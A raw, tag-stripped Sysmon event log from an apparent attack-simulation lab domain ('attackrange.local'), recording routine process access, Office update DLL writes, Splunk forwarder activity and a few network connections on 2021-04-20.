14:54:03.315{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB0B-607E-740B-00000000BB01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.315{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB0B-607E-740B-00000000BB01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.175{A7A01FEF-EB0B-607E-740B-00000000BB01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\FPSRVUTL.DLL2021-04-20 14:54:03.284 11241100x800000000000000063798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\ole db\xmlrw.dll2021-04-20 14:54:03.284 11241100x800000000000000063797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\ole db\xmlrwbin.dll2021-04-20 14:54:03.284 11241100x800000000000000063796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADAL.DLL2021-04-20 14:54:03.269 11241100x800000000000000063795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL2021-04-20 14:54:03.269 11241100x800000000000000063794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:03.222 11241100x800000000000000063788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ai.dll2021-04-20 14:54:03.222 11241100x800000000000000063783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:03.222 11241100x800000000000000063775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:03.206 11241100x800000000000000063774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:03.206 11241100x800000000000000063773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:03.206 11241100x800000000000000063772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:03.206 11241100x800000000000000063771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dll2021-04-20 14:54:03.159 11241100x800000000000000063770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:03.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso50win32client.dll2021-04-20 14:54:03.159 23542300x800000000000000049450Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:03.915{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDFE8A5C07F14CFB092D1C1AE8701CE8,SHA256=94F856E3D44CBC4D7F1A85608FAC11EFE554B94A8C5503096521A4910189B5A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049449Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:03.134{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD80596198314E7829CFC2FD78323EC6,SHA256=BCCBE4621FB3A2DE3498AFB0D023B5D0E1EA105ED6C8B660A9334A34E47C091A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SHAREPOINTPROVIDER.DLL2021-04-20 14:54:04.925 11241100x800000000000000063929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.925{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SignalRClient.dll2021-04-20 14:54:04.925 11241100x800000000000000063928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.893{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\MSO20SKYPEWIN32.DLL2021-04-20 14:54:04.878 11241100x800000000000000063927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.878{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOA.DLL2021-04-20 14:54:04.878 11241100x800000000000000063926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\STSLIST.DLL2021-04-20 14:54:04.847 11241100x800000000000000063925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Tec.dll2021-04-20 14:54:04.847 11241100x800000000000000063924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TecProxy.dll2021-04-20 14:54:04.847 11241100x800000000000000063923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TellMeRuntime.dll2021-04-20 14:54:04.847 11241100x800000000000000063922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextConversionModule.dll2021-04-20 14:54:04.847 11241100x800000000000000063921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Ucmp.dll2021-04-20 14:54:04.847 354300x800000000000000063920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.452{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57481-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000063919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.452{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57481-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000063918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.950{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55973-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000063917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:04.831{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1897BEF78430515F6DC73D9CC98860BE,SHA256=B2218CA45ADC2B073BC02902B7ADA3D7A75F90BD4F1E25A8030095934E588CB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:04.831{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=935E7F40B08EA665A3F83C5337237F7D,SHA256=18B01EDE0DD259102CD5ABC2FBB580ADBFC0BD21754EB964CDA736796D5A0538,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.815{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\upe.dll2021-04-20 14:54:04.815 11241100x800000000000000063914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.722{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 